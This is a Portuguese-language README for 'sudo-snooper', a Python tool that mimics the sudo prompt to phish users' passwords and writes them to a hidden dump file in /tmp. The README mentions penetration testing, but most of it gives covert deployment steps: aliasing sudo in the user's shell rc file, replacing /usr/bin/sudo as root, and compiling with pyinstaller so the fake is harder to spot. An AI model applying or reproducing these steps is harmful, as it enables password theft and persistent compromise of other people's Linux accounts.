
Script em Python que se comporta como o binário sudo original para enganar usuários e fazê-los digitar suas senhas
sudo-snooper age como o binário sudo original para enganar os usuários a inserir suas senhas.
Ele mostrará um prompt falso, igual ao original, para o usuário inserir sua senha do sudo.
Isso pode ser útil em testes de penetração ou avaliações de segurança para testar o conhecimento do usuário.
Esta opção é mais fácil de fazer e mais portátil, no entanto pode ser mais perceptível para usuários atentos.
Edite o arquivo .rc do shell que o usuário está utilizando (pode ser .bashrc, .zshrc e assim por diante) e adicione o seguinte:
alias sudo='python3 /path/to/sudo-snooper.py'
Certifique-se de que o sudo-snooper.py tenha as permissões corretas.
Você precisa de acesso root para esta opção de instalação
Isso só se torna útil se você já tem acesso root mas não consegue quebrar os hashes do /etc/shadow por algum motivo. Basicamente, você pode pescar a senha do usuário.
# mv /usr/bin/sudo /usr/bin/somename
Altere estes no sudo-snooper.py:
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
# install -dm755 sudo-snooper.py /usr/bin/sudo
dê as permissões necessárias ao arquivo python
Você pode ser criativo aqui e criar um arquivo executável não legível para os usuários, mas não vou entrar nisso. Verifique algumas das respostas aqui para isso.
NOTA: Uma maneira um pouco mais convincente de instalar isso é compilá-lo usando pyinstaller para que não apareça como um arquivo python quando file /usr/bin/sudo for executado.
Para fazer isso no Archlinux: pyinstaller --onefile sudo-snooper.py funcionará. No entanto, observe que uma vez compilado, você não poderá alterar os parâmetros no binário compilado.
Uma vez instalado, o sudo-snooper pode ser chamado como o sudo normal.
Por exemplo, executando
sudo vim /etc/resolv.conf
resultará na chamada do sudo-snooper (assumindo que esteja devidamente instalado).
Ele solicitará a senha do usuário e então executará o comando redirecionando para o binário sudo real se a senha estiver correta.
Você pode então recuperar a senha do usuário lendo o arquivo de dump nas configurações.